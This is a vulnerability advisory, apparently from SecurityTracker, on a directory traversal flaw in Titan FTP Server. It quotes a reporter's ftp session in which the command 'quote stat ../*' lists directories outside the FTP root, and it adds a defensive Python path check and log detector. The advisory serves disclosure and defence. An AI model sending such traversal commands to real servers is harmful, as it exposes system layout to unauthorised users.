Titan FTP Server Discloses Directory Listings to Remote Authenticated Users, Including Anonymous Users

SecurityTracker Alert ID: 1006875
CVE Reference: GENERIC-MAP-NOMATCH
Updated: May 4 2004
Original Entry Date: May 29 2003
Impact: Disclosure of system information, Disclosure of user information
Exploit Included: Yes
Advisory: Damage Hacking Group
Version(s): 2.02 build 99
Description: A directory traversal vulnerability was reported in the Titan FTP Server. The server does not validate the path argument of the FTP STAT command against the FTP root, so a remote authenticated user can view directory listings for directories located outside of the FTP root directory.
Damage Hacking Group reported that a remote authenticated user, including an anonymous FTP user, can use the following type of command to "stat" arbitrary directories on the system:
quote stat ../*
A demonstration exploit transcript is provided in the Source Message.
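As an added defensive example (not code from the advisory, the reporter or the vendor), the path check a server should apply to a STAT/LIST argument before touching the filesystem, followed by a detection pass over constructed command-log lines; the virtual-root model, the log format and the verbs flagged are assumptions:

```python
import re

def virtual_path(cwd, arg):
    """Canonicalise a client-supplied STAT/LIST argument against the virtual
    FTP root ('/' is the root as the server exposes it). Returns the canonical
    path, or None if the argument climbs above the root: the check a server
    must make before handing the path to the operating system."""
    raw = arg.replace("\\", "/")  # Windows target: accept both separators
    full = raw if raw.startswith("/") else cwd.rstrip("/") + "/" + raw
    parts = []
    for comp in full.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                return None  # '..' with nothing left to pop: escaped the root
            parts.pop()
        else:
            parts.append(comp)
    return "/" + "/".join(parts)

# Constructed command-log lines (not Titan's real format): timestamp, client, user, verb, argument.
SAMPLE_LOG = """\
2003-05-29 01:10:02 127.0.0.1 anonymous USER anonymous
2003-05-29 01:10:05 127.0.0.1 anonymous LIST
2003-05-29 01:10:11 127.0.0.1 anonymous STAT ../*
2003-05-29 01:10:14 127.0.0.1 anonymous STAT ../../*
2003-05-29 01:10:20 127.0.0.1 anonymous STAT pub/*
"""
LOG_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<ip>\S+) (?P<user>\S+) (?P<cmd>[A-Z]+)(?: (?P<arg>.*))?$")

def find_stat_traversal(log_text):
    """Return (timestamp, client, user, argument) for STAT/LIST/NLST commands
    whose argument contains a '..' component. The log carries no working
    directory, so every parent reference is flagged for review rather than
    only confirmed escapes; on an unpatched server any '..' in STAT merits a look."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("cmd") not in ("STAT", "LIST", "NLST") or not m.group("arg"):
            continue
        if ".." in m.group("arg").replace("\\", "/").split("/"):
            hits.append((m.group("ts"), m.group("ip"), m.group("user"), m.group("arg")))
    return hits

if __name__ == "__main__":
    print(virtual_path("/", "../*"))         # None: refused
    print(virtual_path("/pub", "../bin/*"))  # /bin/*: stays inside the root
    for hit in find_stat_traversal(SAMPLE_LOG):
        print("traversal attempt:", hit)
```

Note that a naive `os.path.normpath("/../*")` collapses the leading `..` silently and returns `/*`, which is why the component walk above refuses instead of normalising.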

Impact: A remote user can obtain directory listings and directory information for arbitrary directories on the target server.

Solution: No solution was available at the time of this entry.

Vendor URL: www.titanftp.com/products/titanftp/index.html

Cause: Input validation error

Underlying OS: Windows (Any)

Message History:
None.

Source Message Contents

Date: Thu, 29 May 2003 01:12:42 -0400
Subject: TitanFTP server directory traversal
|
################################################################
# _____ __ __ ___ #
# ........\ \.| |.| |/ \........ #
# : / \| | | | __> : #
# : / _ \ |_| | / __ : #
# : / / \ | <_/ \ : #
# :..../ _/ / _ | ` \....: #
# : \_________/__| |__|_______/ : #
# : Damage Hacking Group : #
# : Security Advisory : #
# :.............................: #
# #
# http://www.dhgroup.org #
#b d#
##b,________________________________________________________.d##
| |
Products: TitanFTP server v2.02 build 99 &
VisNetic FTP server v2.00 build 94
Authors: www.titanftp.com
www.deerfield.com
Vulnerability: directory traversal
#--------------------------------------------------------------#
| |
Overview:
~~~~~~~~~
Two FTP servers. They seem like brothers and have identical
bugs :)
| |
#--------------------------------------------------------------#
| |
Problem:
~~~~~~~~
D:\WINNT>ftp 127.0.0.1
Connecting to 127.0.0.1.
220 Titan FTP Server 2.02.99 Ready.
User (127.0.0.1:(none)): anonymous
331 User name okay, need password.
Password:
230-Welcome anonymous from 127.0.0.1. You are now logged into the server.
230 User logged in, proceed.
ftp> dir
200 PORT command successful.
150 File status okay; about to open data connection.
total 8
d--------- 1 owner group 512 May 24 20:35 .
d--------- 1 owner group 512 May 24 20:35 ..
d--------- 1 owner group 512 May 24 20:35 bin
d--------- 1 owner group 512 May 24 20:35 incoming
d-wx-wx--- 1 owner group 512 May 24 20:35 pub
d--------- 1 owner group 512 May 24 20:35 usr
-rw------- 1 owner group 6 May 24 21:45 test2.txt
226 Closing data connection. Transferred 451 bytes.
ftp: 451 bytes received in 0,01seconds 45,10 (??/???).
ftp> quote stat ../*
212-Status of *
d--------- 1 owner group 512 May 24 20:35 .
d--------- 1 owner group 512 May 24 20:35 ..
d--------- 1 owner group 512 May 24 20:35 local
-rw------- 1 owner group 6 May 24 21:45 test1.txt
d--------- 1 owner group 512 May 24 20:35 local
212 End of Status.
ftp> quote stat ../../*
212-Status of *
d--------- 1 owner group 512 May 24 20:33 srtFtpLogs
d--------- 1 owner group 512 May 24 20:35 srtFtpData
-rw------- 1 owner group 6 May 24 21:51 test.txt
-rw------- 1 owner group 29632 May 25 00:25 xpl.txt
d--------- 1 owner group 512 May 11 2002 Documents and Settings
d--------- 1 owner group 512 May 13 22:27 Program Files
d--------- 1 owner group 512 May 22 17:10 WINNT
d--------- 1 owner group 512 May 24 20:35 local
212 End of Status.
ftp> close
221 Session Ended. Downloaded 0KB, Uploaded 0KB. Goodbye anonymous from 127.0.0.1.
ftp> quit
D:\WINNT>^_^
| |
#--------------------------------------------------------------#
Exploit:
~~~~~~~~
none
| |
#--------------------------------------------------------------#
| :wow: |
~~~
NeKr0 /DHG www.dhgroup.org
| |
#______________________________________________________________#
\___________________________da_end___________________________/
Best regards www.dhgroup.org
D4rkGr3y icq 540981